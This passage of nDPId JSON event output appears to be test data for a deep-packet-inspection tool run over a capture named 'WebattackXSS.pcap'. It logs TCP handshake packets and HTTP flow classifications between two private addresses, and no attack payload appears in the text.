-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6626,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":397,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347637687,"flow_last_seen":1499347642795,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347761829,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59328,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6626,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":398,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347640199,"flow_last_seen":1499347645794,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347761829,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59354,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6626,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":398,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347640199,"flow_last_seen":1499347645794,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347761829,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59354,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6626,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":399,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347641440,"flow_last_seen":1499347646795,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347761829,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59368,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6626,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":399,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347641440,"flow_last_seen":1499347646795,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347761829,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59368,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6626,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":400,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347642716,"flow_last_seen":1499347647795,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347761829,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59382,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6626,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":400,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347642716,"flow_last_seen":1499347647795,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347761829,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59382,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6629,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":469,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347762675,"flow_last_seen":1499347762675,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347762675,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60666,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6629,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":469,"flow_packet_id":1,"flow_last_seen":1499347762675,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347762675,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8U3VAAD4GclusEAABwKgKMuz6AFDBm6M8AAAAAKACchAbXAAAAgQFtAQCCAoBO\/BJAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6630,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":469,"flow_packet_id":2,"flow_last_seen":1499347762675,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347762675,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ7Proa5y3wZujPaAScSDRcwAAAgQFtAQCCAoD5cG+ATvwSQEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6631,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":469,"flow_packet_id":3,"flow_last_seen":1499347762676,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347762676,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0U3ZAAD4GcmKsEAABwKgKMuz6AFDBm6M96GucuIAQAOVwewAAAQEICgE78EkD5cG+"} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6651,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":470,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347765229,"flow_last_seen":1499347765229,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347765229,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60692,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6651,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":470,"flow_packet_id":1,"flow_last_seen":1499347765229,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347765229,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8oyZAAD4GIqqsEAABwKgKMu0UAFACp1HuAAAAAKACchApBgAAAgQFtAQCCAoBO\/LIAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6652,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":470,"flow_packet_id":2,"flow_last_seen":1499347765230,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347765230,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ7RRH+ZWsAqdR76AScSCEHQAAAgQFtAQCCAoD5cQ8ATvyyAEDAwc="} 
-00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6653,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":470,"flow_packet_id":3,"flow_last_seen":1499347765230,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347765230,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0oydAAD4GIrGsEAABwKgKMu0UAFACp1HvR\/mVrYAQAOUjJQAAAQEICgE78sgD5cQ8"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6660,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":471,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347766506,"flow_last_seen":1499347766506,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347766506,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60706,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6660,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":471,"flow_packet_id":1,"flow_last_seen":1499347766506,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347766506,"pkt":"ABm5CmnxAMGxFOsxCABFAAA80XFAAD4G9F6sEAABwKgKMu0iAFC65SV2AAAAAKACchCb8gAAAgQFtAQCCAoBO\/QHAAAAAAEDAwc="} 
-00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6661,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":471,"flow_packet_id":2,"flow_last_seen":1499347766506,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347766506,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ7SI0\/7eouuUld6AScSDmxwAAAgQFtAQCCAoD5cV8ATv0BwEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6662,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":471,"flow_packet_id":3,"flow_last_seen":1499347766507,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347766507,"pkt":"ABm5CmnxAMGxFOsxCABFAAA00XJAAD4G9GWsEAABwKgKMu0iAFC65SV3NP+3qYAQAOWFzwAAAQEICgE79AcD5cV8"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6672,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":472,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347767793,"flow_last_seen":1499347767793,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347767793,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60720,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6672,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":472,"flow_packet_id":1,"flow_last_seen":1499347767793,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347767793,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8sEFAAD4GFY+sEAABwKgKMu0wAFC7\/0UIAAAAAKACchB59gAAAgQFtAQCCAoBO\/VJAAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6673,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":472,"flow_packet_id":2,"flow_last_seen":1499347767793,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347767793,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ7TCCU6kzu\/9FCaAScSCEqwAAAgQFtAQCCAoD5ca9ATv1SQEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6674,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":472,"flow_packet_id":3,"flow_last_seen":1499347767793,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347767793,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0sEJAAD4GFZasEAABwKgKMu0wAFC7\/0UJglOpNIAQAOUjswAAAQEICgE79UkD5ca9"} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6684,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":473,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347769077,"flow_last_seen":1499347769077,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347769077,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60734,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6684,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":473,"flow_packet_id":1,"flow_last_seen":1499347769077,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347769077,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8n3VAAD4GJlusEAABwKgKMu0+AFAozWn\/AAAAAKACchDm4gAAAgQFtAQCCAoBO\/aKAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6685,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":473,"flow_packet_id":2,"flow_last_seen":1499347769077,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347769077,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ7T59G4FkKM1qAKAScSAdXgAAAgQFtAQCCAoD5cf+ATv2igEDAwc="} 
-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6686,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":473,"flow_packet_id":3,"flow_last_seen":1499347769078,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347769078,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0n3ZAAD4GJmKsEAABwKgKMu0+AFAozWoAfRuBZYAQAOW8ZQAAAQEICgE79ooD5cf+"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6693,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":474,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347770345,"flow_last_seen":1499347770345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347770345,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60748,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6693,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":474,"flow_packet_id":1,"flow_last_seen":1499347770345,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347770345,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8anZAAD4GW1qsEAABwKgKMu1MAFBCsJ2xAAAAAKACchCYAgAAAgQFtAQCCAoBO\/fHAAAAAAEDAwc="} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6694,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":474,"flow_packet_id":2,"flow_last_seen":1499347770345,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347770345,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ7UyjrEwnQrCdsqAScSDb7AAAAgQFtAQCCAoD5ck7ATv3xwEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6695,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":474,"flow_packet_id":3,"flow_last_seen":1499347770346,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347770346,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0andAAD4GW2GsEAABwKgKMu1MAFBCsJ2yo6xMKIAQAOV69AAAAQEICgE798cD5ck7"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6705,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":475,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347771635,"flow_last_seen":1499347771635,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347771635,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60762,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6705,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":475,"flow_packet_id":1,"flow_last_seen":1499347771635,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347771635,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8jzNAAD4GNp2sEAABwKgKMu1aAFBxsHY6AAAAAKACchCPKQAAAgQFtAQCCAoBO\/kJAAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6706,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":475,"flow_packet_id":2,"flow_last_seen":1499347771635,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347771635,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ7VoJ3i\/mcbB2O6AScSCH4AAAAgQFtAQCCAoD5cp+ATv5CQEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6707,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":475,"flow_packet_id":3,"flow_last_seen":1499347771636,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347771636,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0jzRAAD4GNqSsEAABwKgKMu1aAFBxsHY7Cd4v54AQAOUm6AAAAQEICgE7+QkD5cp+"} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6714,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":401,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347645232,"flow_last_seen":1499347650797,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347771832,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59408,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6714,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":401,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347645232,"flow_last_seen":1499347650797,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347771832,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59408,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6714,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":402,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347646486,"flow_last_seen":1499347651805,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347771832,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59422,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6714,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":402,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347646486,"flow_last_seen":1499347651805,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347771832,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59422,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6714,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":403,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347647733,"flow_last_seen":1499347652800,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347771832,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59436,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6714,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":403,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347647733,"flow_last_seen":1499347652800,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347771832,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59436,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6714,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":404,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347650289,"flow_last_seen":1499347655800,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347771832,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59462,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6714,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":404,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347650289,"flow_last_seen":1499347655800,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347771832,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59462,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6714,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":405,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347651555,"flow_last_seen":1499347656799,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347771832,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59476,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6714,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":405,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347651555,"flow_last_seen":1499347656799,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347771832,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59476,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6714,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":406,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347654065,"flow_last_seen":1499347659803,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347771832,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59502,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 